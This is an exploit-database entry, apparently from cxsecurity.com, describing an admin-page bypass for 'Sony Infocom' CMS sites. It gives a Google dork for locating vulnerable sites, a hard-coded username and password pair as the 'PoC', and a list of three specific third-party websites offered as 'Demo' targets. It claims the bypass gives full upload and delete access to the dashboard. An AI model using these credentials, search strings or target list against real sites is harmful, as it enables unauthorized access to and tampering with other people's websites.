# Exploit Title: Sony Infocom CMS Admin Page Bypass # Google Dork: inurl:"/administrator" or "/admin" "Design and Developed by : Sony Infocom" & inurl:"/administrator" or "/admin" "Designed by Sony Infocom" # Date: 27-7-2016 # Exploit Author: Iran Security Team # Discovered by : MR.BL4CK # Vendor Homepage: http://www.sonyinfocom.com # Tested on: Windows # CVE : None Describe : This Exploit Allow The Attacker to bypass the adminpage. Login to the admin Dashboard Give you Full Access to pload or Delete .....etc PoC: enter fill username or email and Password like the information below : Username: info@user.com Password: 123 Demo : http://www.rcpindia.in/2015/administrator/ http://www.gautamcompetitioncoaching.com/administrator/ http://www.krishnaply.com/administrator/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top